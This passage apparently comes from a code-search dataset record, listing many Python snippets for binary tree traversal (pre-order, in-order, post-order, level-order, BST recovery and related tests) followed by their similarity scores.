And it correct.", "def _traverse_post_order(tree: HuffmanTree, byte_list: List[int] = None) \\\n -> List:\n if not tree.is_leaf():\n if byte_list is None:\n byte_list = []\n\n byte_list = _traverse_post_order(tree.left, byte_list)\n byte_list = _traverse_post_order(tree.right, byte_list)\n\n if not tree.left.is_leaf():\n byte_list.append(1)\n byte_list.append(tree.left.number)\n\n if tree.left.is_leaf():\n byte_list.append(0)\n byte_list.append(tree.left.symbol)\n\n if not tree.right.is_leaf():\n byte_list.append(1)\n byte_list.append(tree.right.number)\n\n if tree.right.is_leaf():\n byte_list.append(0)\n byte_list.append(tree.right.symbol)\n\n return byte_list", "def traverse_postorder(operation):\n\n nodes_postorder = []\n def recurse(node):\n if isinstance(node, Operation):\n for input_node in node.input_nodes:\n recurse(input_node)\n nodes_postorder.append(node)\n\n recurse(operation)\n return nodes_postorder", "def pre_order(self):\n stack = []\n node = self\n while stack or node:\n if node:\n yield node.val\n stack.append(node)\n node = node.left\n else:\n node = stack.pop()\n node = node.right", "def tree_BST(tree): \r\n if(tree==None):\r\n return True\r\n elif (left(tree)!=None):\r\n if(value(left(tree))>value(tree)):\r\n return False\r\n elif (right(tree)!=None):\r\n if(value(right(tree))<value(tree)):\r\n return False\r\n return tree_BST(left(tree))\r\n return tree_BST(right(tree))", "def traverse_postorder(operation):\n\n nodes_postorder = []\n def recurse(node):\n if isinstance(node, Operation):\n for input_node in node.input_nodes:\n recurse(input_node)\n nodes_postorder.append(node)\n\n recurse(operation)\n return nodes_postorder", "def dfs_ex(self, depth: Optional[int] = None,\n reverse: bool = False, mirror: bool = False, post_order: bool = False) \\\n -> Iterable[Tuple['Tree', int, Tuple[int, ...]]]:\n assert not (reverse and post_order), 'Param `post_order` incompatible with param `reverse`'\n if reverse:\n if mirror:\n return non_recursive_tree_dfs_reverse_mirror_ex(self, depth)\n else:\n return non_recursive_tree_dfs_reverse_original_ex(self, depth)\n elif post_order:\n if mirror:\n return non_recursive_tree_dfs_reverse_original_ex(self, depth)\n else:\n return non_recursive_tree_dfs_reverse_mirror_ex(self, depth)\n else:\n if mirror:\n return non_recursive_tree_dfs_forward_mirror_ex(self, depth)\n else:\n return non_recursive_tree_dfs_forward_original_ex(self, depth)", "def preorder(self,root)->list:\n\t\tres=[]\n\t\tif root:\n\t\t\tres.append(root.data)\n\t\t\tres=res+self.preorder(root.left)\n\t\t\tres=res+self.preorder(root.right)\n\t\treturn res", "def post_order_search_stack(self, root):\n if root is None:\n return\n myStack1 = []\n myStack2 = []\n node = root\n myStack1.append(node)\n while myStack1: # 这个while循环的功能是找出后序遍历的逆序,存在myStack2里面\n node = myStack1.pop()\n if node.lchild:\n myStack1.append(node.lchild)\n if node.rchild:\n myStack1.append(node.rchild)\n myStack2.append(node)\n while myStack2: # 将myStack2中的元素出栈,即为后序遍历次序\n pass\n # print(myStack2.pop().elem)", "def expression_tree(postfix:str) -> Node:\n stack = deque()\n for ch in postfix:\n if ch not in {'+', '-', '*', '/', '^'}:\n stack.append(Node(ch))\n else:\n middle_node = Node(ch)\n right_node = stack.pop()\n left_node = stack.pop()\n middle_node ._right = right_node\n middle_node._left = left_node\n stack.append(middle_node)\n return stack.pop()", "def recoverTree(self, root: TreeNode) -> None:\n self.firstNode = None\n self.secondNode = None\n self.preNode = TreeNode(float(\"-inf\"))\n\n def 
in_order(root):\n if not root:\n return\n in_order(root.left)\n if self.firstNode == None and self.preNode.val >= root.val:\n self.firstNode = self.preNode\n if self.firstNode and self.preNode.val >= root.val:\n self.secondNode = root\n self.preNode = root\n in_order(root.right)\n\n in_order(root)\n self.firstNode.val, self.secondNode.val = self.secondNode.val, self.firstNode.val", "def in_order(self):\n def walk(root):\n\n if root.left:\n walk(root.left)\n\n self.in_values.append(root.value)\n\n if root.right:\n walk(root.right)\n \n walk(self.root)\n return self.in_values", "def test_right_rotation_three_node_tree_including_root():\n from bbst import Bst\n tree = Bst([5, 4, 3])\n assert tuple(tree.in_order()) == (3, 4, 5)\n assert tuple(tree.breadth_first()) == (4, 3, 5)\n assert tuple(tree.pre_order()) == (4, 3, 5)\n assert tuple(tree.post_order()) == (3, 5, 4)\n assert tree.depth() == 2\n assert tree.balance() == 0", "def preorder(head):\r\n if head == None:\r\n return\r\n preorder(head.left) #recursive call to left\r\n preorder(head.right) #recursive call to right\r", "def test_postorder_traversal(depth_one_tree):\n testlist = []\n depth_one_tree.post_order(lambda x: testlist.append(x))\n assert str(testlist) == str([1, 2, 3, 4, 0])", "def preorder_recursive(root):\n if root:\n print(root.data, end=\" \")\n preorder_recursive(root.left)\n preorder_recursive(root.right)", "def inorder_traversal(root, inorder):\r\n if root is None:\r\n return\r\n\r\n inorder_traversal(root.left, inorder)\r\n inorder.append(root.val)\r\n inorder_traversal(root.right, inorder)\r\n return inorder", "def in_order_nodes(root):\n if root.get_left():\n for node in in_order_nodes(root.get_left()):\n yield node\n\n yield root\n\n if root.get_right():\n for node in in_order_nodes(root.get_right()):\n yield node", "def RecursiveTraversal(self, root: TreeNode, strategy: str) -> List[int]:\n\n result = []\n if (root):\n if strategy == 'POST':\n if (root.left is not None):\n result = result + self.RecursiveTraversal(root.left,strategy)\n if (root.right is not None):\n result = result + self.RecursiveTraversal(root.right,strategy)\n result.append(root.val)\n elif strategy == 'PRE':\n result.append(root.val)\n if (root.left is not None):\n result = result + self.RecursiveTraversal(root.left,strategy)\n if (root.right is not None):\n result = result + self.RecursiveTraversal(root.right,strategy)\n elif strategy == 'IN':\n if (root.left is not None):\n result = result + self.RecursiveTraversal(root.left,strategy)\n result.append(root.val)\n if (root.right is not None):\n result = result + self.RecursiveTraversal(root.right,strategy)\n return result", "def postorderUtil(self, root):\n if root:\n self.postorderUtil(root.left)\n self.postorderUtil(root.right)\n self.postlist.append(root.key)\n return self.postlist", "def test_binarytree_post_order_exists():\n assert BinaryTree.post_order", "def postorder(self,node):\n if node is not None:\n self.postorder(node.left)\n self.postorder(node.right)\n print node.value,", "def inorder_no_recursion(self):\n\n traversal, stack = [], []\n stack.append(self.root)\n\n while stack:\n node = stack.pop()\n if node.right and not node.right.visited:\n stack.append(node.right)\n node.right.visited = True\n if not node.left or node.left.visited:\n # Only append if left side empty or visited\n traversal.append(node.data)\n node.visited = True\n elif node.left:\n stack.extend([node, node.left])\n\n return traversal", "def binary_tree_level_order(node: Node) -> None:\r\n\r\n queue = [node]\r\n 
while len(queue):\r\n node = queue.pop(0)\r\n yield node.value\r\n if node.left is not None:\r\n queue.append(node.left)\r\n if node.right is not None:\r\n queue.append(node.right)", "def nodes(self, root=None, order=\"preorder\"):\n methods = {\n \"preorder\": self._preorder_traversal,\n \"inorder\": self._inorder_traversal,\n \"postorder\": self._postorder_traversal,\n \"levelorder\": self._levelorder_traversal,\n \"breadthfirst\": self._levelorder_traversal,\n \"timeasc\": self._timeasc_traversal,\n \"timedesc\": self._timedesc_traversal,\n \"minlex_postorder\": self._minlex_postorder_traversal,\n }\n try:\n iterator = methods[order]\n except KeyError:\n raise ValueError(f\"Traversal ordering '{order}' not supported\")\n\n root = -1 if root is None else root\n return iterator(root)", "def pre_order_traversal(self, root):\n\n def pre_order_traversal_helper(root):\n if root:\n result.append(root.data)\n pre_order_traversal_helper(root.left)\n pre_order_traversal_helper(root.right)\n\n result = []\n pre_order_traversal_helper(root)\n return result", "def test_left_rotation_three_node_tree_including_root():\n from bbst import Bst\n tree = Bst([3, 4, 5])\n assert tuple(tree.in_order()) == (3, 4, 5)\n assert tuple(tree.breadth_first()) == (4, 3, 5)\n assert tuple(tree.pre_order()) == (4, 3, 5)\n assert tuple(tree.post_order()) == (3, 5, 4)\n assert tree.depth() == 2\n assert tree.balance() == 0", "def setUp(self):\n\n self.root = TreeNode(1)\n\n inorderL= [3,2,5,4]\n preorderL = [2,3,4,5]\n left_subtree = Tree.from_inorder_preorder(inorderL, preorderL)\n\n inorderR = [4,5,2,3]\n preorderR = [2,4,5,3]\n right_subtree = Tree.from_inorder_preorder(inorderR, preorderR)\n\n self.root.left = left_subtree.root\n self.root.right = right_subtree.root\n\n tree = Tree(self.root)", "def binary_tree(length, depth):\n if depth == 0:\n return # base case\n posx = turtle.xcor()\n posy = turtle.ycor()\n left(length, depth)\n turtle.up()\n turtle.goto(posx, posy)\n #turtle.dot()\n turtle.down()\n right(length, depth)", "def recoverTree(self, root: TreeNode) -> None:\n def inorder(root):\n if not root:\n return\n inorder(root.left)\n if self.secondNode:\n return\n elif not self.firstNode and self.preNode.val > root.val:\n self.firstNode = self.preNode\n self.firstNodeNext = root\n elif self.firstNode and self.preNode.val > root.val:\n self.secondNode = root\n self.preNode = root\n inorder(root.right)\n\n inorder(root)\n if not self.secondNode:\n self.firstNode.val, self.firstNodeNext.val = self.firstNodeNext.val, self.firstNode.val\n else:\n self.firstNode.val, self.secondNode.val = self.secondNode.val, self.firstNode.val", "def _gen_test_tree_3():\n tree = BinaryNode(5)\n tree.left = BinaryNode(1)\n tree.left.left = BinaryNode(2)\n tree.left.right = BinaryNode(3)\n tree.right = BinaryNode(7)\n tree.right.left = BinaryNode(8)\n tree.right.right = BinaryNode(9)\n return tree", "def postorder(self, root_node):\r\n # Cf. 
Zhang & Shasha:p.1249:\r\n # \"Let T[I] be the ith node in the tree according to the left-to-right\r\n # postordering\" \r\n tmp = []\r\n if not root_node.is_leaf():\r\n for node in root_node:\r\n tmp2 = self.postorder(node)\r\n if type(tmp2) is list:\r\n tmp.extend(tmp2)\r\n else:\r\n tmp.append(tmp2)\r\n tmp.append(root_node)\r\n return tmp\r\n \r\n else:\r\n return root_node", "def _subtree_postorder(self, p):\n for c in self.children(p): # for each child c\n for other in self._subtree_postorder(c): # do postorder of c's subtree\n yield other # yielding each to our caller\n yield p # visit p after its subtrees", "def _subtree_inorder(self, p):\n if self.left(p) is not None: # if left child exists, traverse its subtree\n for other in self._subtree_inorder(self.left(p)):\n yield other\n yield p # visit p between its subtrees\n if self.right(p) is not None: # if right child exists, traverse its subtree\n for other in self._subtree_inorder(self.right(p)):\n yield other", "def test_post_order_0_1(bst_balanced):\n assert tuple(bst_balanced.post_order()) == (1, 3, 2, 7, 6, 5)", "def _gen_test_tree_2():\n tree = BinaryNode(5)\n tree.left = BinaryNode(3)\n tree.left.left = BinaryNode(2)\n tree.left.left.left = BinaryNode(1)\n tree.left.right = BinaryNode(4)\n tree.right = BinaryNode(7)\n tree.right.left = BinaryNode(6)\n tree.right.right = BinaryNode(8)\n tree.right.right.right = BinaryNode(9)\n return tree" ]
[ "0.6668872", "0.6449099", "0.6396742", "0.6088152", "0.60584265", "0.5841729", "0.57979167", "0.5787835", "0.5776373", "0.5711486", "0.55507797", "0.5525655", "0.5513274", "0.5498472", "0.54892987", "0.5478768", "0.54738367", "0.5418973", "0.53901404", "0.53882676", "0.53662634", "0.5342413", "0.53129363", "0.5307645", "0.53002566", "0.52778006", "0.5276526", "0.52742505", "0.5267223", "0.52619344", "0.5256699", "0.525214", "0.52471745", "0.5218045", "0.5189556", "0.51613355", "0.51606935", "0.5159243", "0.5152476", "0.51502454", "0.5139615", "0.5134672", "0.5130151", "0.511474", "0.50898105", "0.5084526", "0.5071188", "0.5070198", "0.5063434", "0.5061202", "0.5058596", "0.5056264", "0.5053817", "0.5042791", "0.5039743", "0.50396085", "0.50377923", "0.50369984", "0.50297236", "0.5029424", "0.50279623", "0.501718", "0.50095737", "0.5008648", "0.50085276", "0.50031984", "0.49951258", "0.49948177", "0.4983731", "0.4978334", "0.49774358", "0.49702522", "0.49635985", "0.49528202", "0.49493456", "0.49330896", "0.4932132", "0.49298346", "0.49250847", "0.4911891", "0.49030218", "0.48867628", "0.4885733", "0.48840854", "0.4878112", "0.48745412", "0.48718113", "0.4868945", "0.4867292", "0.4863488", "0.4861946", "0.48605302", "0.48585838", "0.4858436", "0.48547605", "0.48466766", "0.4830053", "0.48270053", "0.48247617", "0.4824063" ]
0.66620654
1
Create and return an instance of the Isort plugin.
def setup_isort_tool_plugin(custom_rsc_path=None):
    arg_parser = argparse.ArgumentParser()
    if custom_rsc_path is not None:
        resources = Resources([custom_rsc_path])
    else:
        resources = Resources(
            [os.path.join(os.path.dirname(statick_tool.__file__), "plugins")]
        )
    config = Config(resources.get_file("config.yaml"))
    plugin_context = PluginContext(arg_parser.parse_args([]), resources, config)
    plugin_context.args.output_directory = os.path.dirname(__file__)
    itp = IsortToolPlugin()
    itp.set_plugin_context(plugin_context)
    return itp
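A hedged usage sketch for the factory above. The import paths are assumptions based on statick's typical package layout (resources.py, config.py, plugin_context.py, and a plugins/tool/ directory) and are not confirmed by this record; the expected plugin name "isort" matches the plugin-discovery test among the negatives below.

import argparse
import os

import statick_tool
from statick_tool.config import Config
from statick_tool.plugin_context import PluginContext
from statick_tool.plugins.tool.isort_tool_plugin import IsortToolPlugin  # assumed path
from statick_tool.resources import Resources

# Build the plugin against the default bundled resources and check its name.
itp = setup_isort_tool_plugin()
print(itp.get_name())  # expected: "isort"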
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sorter(Plugin):\n return Plugin.order", "def create_plugin(self, **kwargs):\n return self.plugin_class(**kwargs)", "def new(self, sort, properties=None):\n if sort is None:\n sort = UNKNOWNSORT\n # find next available vid\n vid, index = self.vid, self.index\n while vid in index:\n vid += 1\n varstring = '{}{}'.format(sort, vid)\n index[vid] = varstring\n if properties is None:\n properties = []\n self.store[varstring] = properties\n self.vid = vid + 1\n return (varstring, properties)", "def create_r2plugin(self, **kwargs):\n return self.create_tool(cls=R2Plugin, **kwargs)", "def classFactory(iface):\n from .plugin_builder import PluginBuilder\n return PluginBuilder(iface)", "def classFactory(iface): # pylint: disable=invalid-name\n #\n from .iso4app import MainPlugin\n return MainPlugin(iface)", "def getInstance(config):\n return Plugin(config)", "def getInstance(config):\n return Plugin(config)", "def __init__(\n self,\n plugin_id,\n plugin_name,\n plugin_description,\n plugin_instance,\n plugin_enabled_by_default,\n plugin_version,\n plugin_interface_version,\n instance_file_name,\n plugin_url,\n plugin_configuration,\n ):\n (\n self.__plugin_id,\n self.__plugin_names,\n self.__plugin_description,\n self.__plugin_instance,\n self.__plugin_enabled_by_default,\n self.__plugin_version,\n self.__plugin_interface_version,\n self.__plugin_file_name,\n self.__plugin_url,\n self.__plugin_configuration,\n ) = (\n plugin_id.strip().lower(),\n [],\n plugin_description,\n plugin_instance,\n plugin_enabled_by_default,\n plugin_version,\n plugin_interface_version,\n instance_file_name,\n plugin_url,\n plugin_configuration,\n )\n for next_name in plugin_name.lower().split(\",\"):\n next_name = next_name.strip()\n if next_name:\n self.__plugin_names.append(next_name)", "def __new__(mcls, name, bases, namespace): # @NoSelf - 'mcls' is SortinfoMeta, 'cls' is the new class\n # Check that the namespace is compliant\n if '__slots__' not in namespace:\n raise PydmrsError('Subclasses of Sortinfo must define __slots__')\n if 'features' in namespace:\n raise PydmrsError(\"Subclasses of Sortinfo must not define a 'features' attribute\")\n \n # Force all feature names to be lowercase\n namespace['__slots__'] = tuple(feat.lower() for feat in namespace['__slots__'])\n \n # Create the class, and add the 'features' attribute\n cls = super().__new__(mcls, name, bases, namespace)\n cls.features = tuple(chain.from_iterable(getattr(parent, '__slots__', ())\n for parent in reversed(cls.__mro__)))\n \n # Sortinfo defines a from_normalised_dict method which calls either EventSortinfo or InstanceSortinfo\n # Subclasses need to override this method\n if 'from_normalised_dict' not in namespace:\n cls.from_normalised_dict = cls._from_normalised_dict\n \n return cls", "def test_isort_tool_plugin_found():\n if sys.version_info.major == 3 and sys.version_info.minor < 6:\n pytest.skip(\"isort is only available for Python 3.6+, unable to test\")\n manager = PluginManager()\n # Get the path to statick_tool/__init__.py, get the directory part, and\n # add 'plugins' to that to get the standard plugins dir\n manager.setPluginPlaces(\n [os.path.join(os.path.dirname(statick_tool.__file__), \"plugins\")]\n )\n manager.setCategoriesFilter(\n {\n \"Tool\": ToolPlugin,\n }\n )\n manager.collectPlugins()\n # Verify that a plugin's get_name() function returns \"isort\"\n assert any(\n plugin_info.plugin_object.get_name() == \"isort\"\n for plugin_info in manager.getPluginsOfCategory(\"Tool\")\n )\n # While we're at it, verify that a 
plugin is named Isort Tool Plugin\n assert any(\n plugin_info.name == \"Isort Tool Plugin\"\n for plugin_info in manager.getPluginsOfCategory(\"Tool\")\n )", "def new(self, plugin, *args, **kwargs):\n if plugin in self.modules.keys():\n return self.modules[plugin](*args, **kwargs)", "def classFactory(iface): # pylint: disable=invalid-name\n #\n from .CCD_Plugin import CCD_Plugin\n return CCD_Plugin(iface)", "def sortby(self):\n ...", "def classFactory(iface): # pylint: disable=invalid-name\n #\n from .eco_valuator import EcoValuatorPlugin\n return EcoValuatorPlugin()", "def _make_sorter(self, ax):\n np_array = ax.get_values()\n # return np_array.argsort()\n # ax = ax.take(indexer)\n sorter = RocRadixSortDriver()\n sorted_array, indices = sorter.sort_with_indices(np_array)\n return sorted_array, indices", "def uctt_plugin_factory_cli_info(\n environment: Environment, instance_id: str = ''):\n return InfoCliPlugin(environment, instance_id)", "def __init__(self, new_sorts, supersorts):\n global crt_sorts\n crt_sorts = new_sorts\n \n super(SortDecl, self).__init__()\n self.new_sorts = new_sorts\n self.supersorts = supersorts", "def __init__(self, ItemComparer):\n self.item_comparer = ItemComparer", "def __init__(self,\r\n n,\r\n sort,\r\n algo,\r\n comps,\r\n exs,\r\n predata,\r\n postdata,\r\n comp_eq,\r\n ex_eq,\r\n time):\r\n self.n = n\r\n self.sort = sort\r\n self.algo = algo\r\n self.comps = comps\r\n self.exs = exs\r\n self.predata = predata\r\n self.postdata = postdata\r\n self.comp_eq = comp_eq\r\n self.ex_eq = ex_eq\r\n self.time = time", "def get_plugin_interface(self):", "def __init__(self, data, draw, speed):\n self.heap_sort(data, draw, speed)", "def create_cutter_plugin():\n return CutterCovPlugin()", "def plugin_instance(self):\n return self.__plugin_instance", "def sort(self, *args, **kwargs) -> \"Actions\":\n self.actions.sort(*args, **kwargs)\n return self", "def uctt_plugin_factory_cli_environment(\n environment: Environment, instance_id: str = ''):\n return EnvironmentCliPlugin(environment, instance_id)", "def _init_sorted_slice(self, *args, **kwargs): # real signature unknown\n pass", "def uctt_plugin_factory_cli_config(\n environment: Environment, instance_id: str = ''):\n return ConfigCliPlugin(environment, instance_id)", "def __init__(self, new_sorts, supersorts):\r\n global crt_sorts\r\n crt_sorts = new_sorts\r\n \r\n super(SortDecl, self).__init__()\r\n self.new_sorts = new_sorts\r\n self.supersorts = supersorts", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHDIF3_Superclass.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def uctt_plugin_factory_output_config(\n environment: Environment, instance_id: str = ''):\n return OutputCliPlugin(environment, instance_id)", "def main(args):\n\tunsorted_array = []\n\n\tif args.order == 'ASC':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\n\tif args.order == 'DESC':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\t\tunsorted_array = list(reversed(unsorted_array))\n\n\tif args.order == 'RAND':\n\t\tunsorted_array = list(range(0, int(args.instancesize)))\n\t\tnp.random.shuffle(unsorted_array)\n\n\tsize = int(args.instancesize)\n\n\tif args.algorithm == 'all':\n\t\tselection_sort(unsorted_array, size)\n\t\tinsertion_sort(unsorted_array, size)\n\t\tshell_sort(unsorted_array, size)\n\t\tmerge_sort(unsorted_array, size)\n\t\theap_sort(unsorted_array, size)\n\t\tquick_sort(unsorted_array, size)\n\n\tif args.algorithm == 
'selection':\n\t\tselection_sort(unsorted_array, size)\n\n\tif args.algorithm == 'insertion':\n\t\tinsertion_sort(unsorted_array, size)\n\n\tif args.algorithm == 'shell':\n\t\tshell_sort(unsorted_array, size)\n\n\tif args.algorithm == 'merge':\n\t\tmerge_sort(unsorted_array, size)\n\n\tif args.algorithm == 'heap':\n\t\theap_sort(unsorted_array, size)\n\n\tif args.algorithm == 'quick':\n\t\tquick_sort(unsorted_array, size)", "def __init__(\n self,\n github: instarepo.github.GitHub,\n sort: str,\n direction: str,\n archived: FilterMode,\n forks: FilterMode,\n repo_prefix: StringFilter,\n language: StringFilter,\n pushed_after,\n pushed_before,\n ):\n self.github = github\n self.sort = sort\n self.direction = direction\n self.archived = archived\n self.forks = forks\n self.repo_prefix = repo_prefix\n self.language = language\n self.pushed_after = pushed_after\n self.pushed_before = pushed_before", "def sortInterfaces(self, sort = \"order\", translation = 0, opt = None, rev = False,\\\n ab = False):\n\n if ab:\n if self.getAB()[0] is None:\n string = \"No alternative base defined\"\n ut.infoPrint(string)\n return\n else:\n ab = 0\n else:\n ab = []\n \n data = self.getData(var = sort, ab = ab, translation = translation)[0]\n if data == []: return\n\n si = np.argsort(data[0])\n\n if rev:\n si = si[::-1]\n\n self.indexSortInterfaces(index = si)", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHDIF3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def __init__(self,\n runscontainer,\n sort_table_by,\n threshold=0.05):\n super().__init__(runscontainer)\n\n self.sort_table_by = sort_table_by\n self.threshold = threshold", "def uctt_plugin_factory_cli_fixtures(\n environment: Environment, instance_id: str = ''):\n return FixturesCliPlugin(environment, instance_id)", "def create_runner(self) -> PluginsRunner:\n return PluginsRunner(\n self.workflow,\n self.workflow.plugins_conf,\n plugins_results=self.workflow.data.plugins_results,\n )", "def get_sort_query(self, kind, order, is_number):\n pass", "def __init__(__self__, *,\n description: Optional[pulumi.Input[str]] = None,\n filters: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n order: Optional[pulumi.Input[int]] = None,\n predicates: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n sso_enabled: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n title: Optional[pulumi.Input[str]] = None,\n token_relay: Optional[pulumi.Input[bool]] = None,\n uri: Optional[pulumi.Input[str]] = None):\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if filters is not None:\n pulumi.set(__self__, \"filters\", filters)\n if order is not None:\n pulumi.set(__self__, \"order\", order)\n if predicates is not None:\n pulumi.set(__self__, \"predicates\", predicates)\n if sso_enabled is not None:\n pulumi.set(__self__, \"sso_enabled\", sso_enabled)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if title is not None:\n pulumi.set(__self__, \"title\", title)\n if token_relay is not None:\n pulumi.set(__self__, \"token_relay\", token_relay)\n if uri is not None:\n pulumi.set(__self__, \"uri\", uri)", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHFIF3_Superclass.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHDIF2_Superclass.__New_orig__()\n import 
itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def yicesSort(self, name):\n name = str(name)\n try:\n return self._yicesSort[name]\n except KeyError:\n sort = yicespy.yices_new_uninterpreted_type()\n self._yicesSort[name] = sort\n return sort", "def oldsortslice(self):\n ...", "def sort(self, pivot='rand'):\n\n choices = ('first', 'median', 'last', 'rand')\n assert pivot in choices\n self.choice = pivot\n return self._recursiveSort(self.obj)", "def add_sort_filter(source, args, index):\n tags = hxl.TagPattern.parse_list(args.get('sort-tags%02d' % index, ''))\n reverse = (args.get('sort-reverse%02d' % index) == 'on')\n return source.sort(tags, reverse)", "def uctt_plugin_factory_provisioner_config(\n environment: Environment, instance_id: str = ''):\n return ProvisionerCliPlugin(environment, instance_id)", "def pluginable(cls):\n # store the functions with the same name\n # that defined by different plugins\n # Note that current (most recently added) is not in the stack\n cls._plugin_stacks = {}\n\n def _original(self, fname):\n \"\"\"Get the original function of self, if it is overridden\"\"\"\n # callframe is oringally -1\n frame = self._plugin_callframe.setdefault(fname, -1)\n frame += 1\n self._plugin_callframe[fname] = frame\n # print(cls._plugin_stacks)\n return cls._plugin_stacks[fname][frame]\n\n cls._original = _original\n\n orig_init = cls.__init__\n\n def __init__(self, *args, **kwargs):\n self._plugin_callframe = {}\n orig_init(self, *args, **kwargs)\n\n cls.__init__ = __init__\n\n if cls.__name__ == \"CmdyHolding\":\n orig_reset = cls.reset\n\n @wraps(orig_reset)\n def reset(self, *args, **kwargs):\n # clear the callframes as well\n self._plugin_callframe = {}\n orig_reset(self, *args, **kwargs)\n return self\n\n cls.reset = reset\n\n return cls", "def sort(self, *args: Any, **kwargs: Any) -> BaseList:\n super().sort(*args, **kwargs)\n return self", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHDIF2.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def sorted(self): \n pass", "def classFactory(iface):\n from qgbif.qgbif import QGBIFPlugin\n return QGBIFPlugin(iface)", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHFIF3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def __init__(\n self,\n name: SortDirection = None\n ):\n\n self.__name = name", "def New(*args, **kargs):\n obj = itkStatisticsImageFilterIUL3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def create_plugin_manager():\n plugin_manager = PiPluginManager(hookspecs.hookspec.project_name)\n plugin_manager.add_hookspecs(hookspecs)\n return plugin_manager", "def indexSortInterfaces(self, index):\n\n self.cell_1 = self.cell_1[index]\n self.cell_2 = self.cell_2[index]\n self.rep_1 = self.rep_1[index]\n self.rep_2 = self.rep_2[index]\n\n self.eps_11 = self.eps_11[index]\n self.eps_22 = self.eps_22[index]\n self.eps_12 = self.eps_12[index]\n self.eps_mas = self.eps_mas[index]\n\n self.atoms = self.atoms[index]\n self.ang = self.ang[index]\n self.e_int_c = self.e_int_c[index]\n self.w_sep_c = self.w_sep_c[index]\n self.w_seps_c = self.w_seps_c[index]\n\n self.e_int_d = self.e_int_d[index]\n self.w_sep_d = self.w_sep_d[index]\n self.w_seps_d = self.w_seps_d[index]\n \n self.order = self.order[index]", "def topsort(self, *start, endpoints=()):\n return TopologicalSorter(self, start, endpoints)", "def classFactory(iface):\n from 
.os_translator_ii import OsTranslatorII\n return OsTranslatorII(iface)", "def New(*args, **kargs):\n obj = itkStatisticsImageFilterID3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def load_plugin():\n return HostTestPluginCopyMethod_Shell()", "def create(cls, beam_elements):\r\n if str(type(beam_elements)) == \"<class 'fconcrete.Structural.BeamElement.BeamElements'>\": return beam_elements\r\n beam_elements = np.array(beam_elements)\r\n x_start = np.array([ beam_element.n1.x for beam_element in beam_elements ])\r\n bar_sort_position = np.argsort(x_start)\r\n return cls(beam_elements[bar_sort_position])", "def New(*args, **kargs):\n obj = itkHalfHermitianToRealInverseFFTImageFilterICF3IF3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def New(*args, **kargs):\n obj = itkStatisticsImageFilterIF3.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def sort(self, sort):\n\n self._sort = sort", "def __init__(self, *args, **kwargs):\n super(PokedexPlugin, self).__init__(*args, **kwargs)\n\n # XXX should we really be doing this here?\n h.pokedex = pokedex_helpers", "def New(*args, **kargs):\n obj = itkStatisticsImageFilterIUL2.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def custom_sort(arr):\n pass", "def New(*args, **kargs):\n obj = itkHistogramToIntensityImageFilterHFIF2_Superclass.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def test_parse_sort(self):\n old_type = Sort('sort', [\n Relationship('student', PersonSchema(), None),\n Relationship('school', StudentSchema(), None)],\n Attribute('title', SchoolSchema(), None), '+')\n new_type = self.driver.parse(old_type)\n\n assert new_type.source == old_type\n assert old_type.relationships != new_type.relationships\n assert isinstance(new_type.relationships[0], Mapper)\n assert old_type.attribute != new_type.attribute\n assert isinstance(new_type.attribute, Column)\n assert old_type.direction == new_type.direction", "def __init__(self, algorithm, list = None, size = 10, unique = True,\n comp = True, swap = True, trace = False):\n self._list = list\n self._size = size\n self._unique = unique\n self._comp = comp\n self._swap = swap\n self._trace = trace\n self._swap_count = 0\n self._comp_count = 0\n self._algorithm = algorithm\n self._start = 0\n self._elapsed_time = 0", "def test_insertSort(self):\n\t\tsortObj=insertSort()\n\t\tself.assertEqual(sortObj.run_sort(self.test_1[0]),self.test_1[1])", "def _new_instance(self):\n return self.__class__(self._vmodule)", "def __init__(self):\n self.data = SortedList()", "def __init__(self):\n\n self.plugin_name = 'Yum'", "def instantiateNewCmd(self):\n return QadGRIPSTRETCHCommandClass(self.plugIn)", "def classFactory(iface): # pylint: disable=invalid-name\n #\n from .quick_digitize import QuickDigitize\n return QuickDigitize(iface)", "def plugin_import(plugin):\n\n return importlib.import_module(plugin, package=\"directord\")", "def New(*args, **kargs):\n obj = itkHalfHermitianToRealInverseFFTImageFilterICF2IF2.__New_orig__()\n import itkTemplate\n itkTemplate.New(obj, *args, **kargs)\n return obj", "def test_insertSort3(self):\n\t\tsortObj=insertSort()\n\t\tself.assertEqual(sortObj.run_sort(self.test_3[0]),self.test_3[1])", "def create_api(self):\n return DJinnAPI(djenkins=self.dj, pipeline_results=self.db)", "def New(*args, **kargs):\n obj = itkStatisticsImageFilterIF2.__New_orig__()\n 
